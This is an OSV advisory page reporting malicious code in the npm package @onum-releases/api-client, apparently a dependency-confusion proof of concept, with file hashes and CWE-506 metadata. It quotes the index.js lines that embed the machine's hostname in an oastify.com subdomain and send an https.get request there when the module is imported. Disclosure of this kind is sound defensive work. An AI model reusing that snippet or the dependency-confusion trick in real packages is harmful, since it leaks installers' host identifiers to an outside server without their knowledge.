MAL-2026-6122
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@onum-releases/api-client/MAL-2026-6122.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-6122
- Published
- 2026-06-18T16:15:13Z
- Modified
- 2026-06-18T17:16:47.694543862Z
- Summary
- Malicious code in @onum-releases/api-client (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (07908d7f0abe458955357ed6814b46c090c70e1b3d34be4dd1a5c02d2507127d)
On require(), index.js reads os.hostname(), embeds it as a subdomain label under a Burp Collaborator (oastify.com) host, and issues an https.get to that host (index.js lines 4-7: 'var host = \'api-client.\' + h + \'.200majoeu01dk02xnjdajro1isojc90y.oastify.com\'; https.get({ host: host, path: \'/api-client\', timeout: 4000 },...)'). Both the DNS resolution and the TLS SNI/Host header transmit the installer's hostname out-of-band to an attacker-controlled collaborator subdomain. Although package.json describes the package as a 'Security PoC placeholder - benign, no runtime payload', the shipped code does perform the exfiltration on every consumer that imports the module. The package appears to be a dependency-confusion proof-of-concept against the @onum-releases scope; regardless of intent, installers that pull it leak host identifiers to a third-party OOB server.
- Database specific
{ "malicious-packages-origins": [ { "sha256": "07908d7f0abe458955357ed6814b46c090c70e1b3d34be4dd1a5c02d2507127d", "source": "amazon-inspector", "modified_time": "2026-06-18T16:15:18Z", "versions": [ "1.0.1" ], "id": "IN-MAL-2026-006992", "import_time": "2026-06-18T17:08:46.686385569Z" }, { "sha256": "7486e72639cbc78438ba4c8f7168253dd1a518629215d0b47163a4a9e3b89511", "source": "amazon-inspector", "modified_time": "2026-06-18T16:15:15Z", "versions": [ "1.0.3" ], "id": "IN-MAL-2026-006988", "import_time": "2026-06-18T17:08:46.42826456Z" }, { "sha256": "c35e222a8741ac5fca65f719f1b8dfcd45e8604685f59825142082bcde5e49ed", "source": "amazon-inspector", "modified_time": "2026-06-18T16:15:13Z", "id": "IN-MAL-2026-006987", "versions": [ "1.0.2" ], "import_time": "2026-06-18T17:08:46.365230644Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / @onum-releases/api-client
Package
- Name
- @onum-releases/api-client
- View open source insights on deps.dev
- Purl
- pkg:npm/%40onum-releases%2Fapi-client
Database specific
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@onum-releases/api-client/MAL-2026-6122.json"
indicators
{
"evidence_files": [
{
"sha256": "090b7902261322b21feecd5505a6ad2762da28a7218b2fc15d494b1dc21493c4",
"tlsh": "9af0dce9d2b5b0503032a5c8e10e900863a3e0802241dec042afd0e92da1a282b06ef8",
"path": "index.js"
},
{
"sha256": "7befd8501ea4e5498d423db2604c3f2d1919227fa519dd619e712e5dbb8fd7e5",
"tlsh": "c4c080200900e43314c5cf714db2ce5507394c1f2741f50c0713101485b67f364f578c",
"path": "package.json"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-SWuM3DCQALCOgcwaaL0jIBtZh8ATcrWerk4tNWV4FDtOE+mg5AyyiDGvMFN4bt2R3jL3Mg/jqbuaIdIYuEHPtg==",
"sha1": "4b46a12a7d2ccd7453dedeb2d343487622eec538"
},
"filename": "api-client-1.0.1.tgz"
}
]
}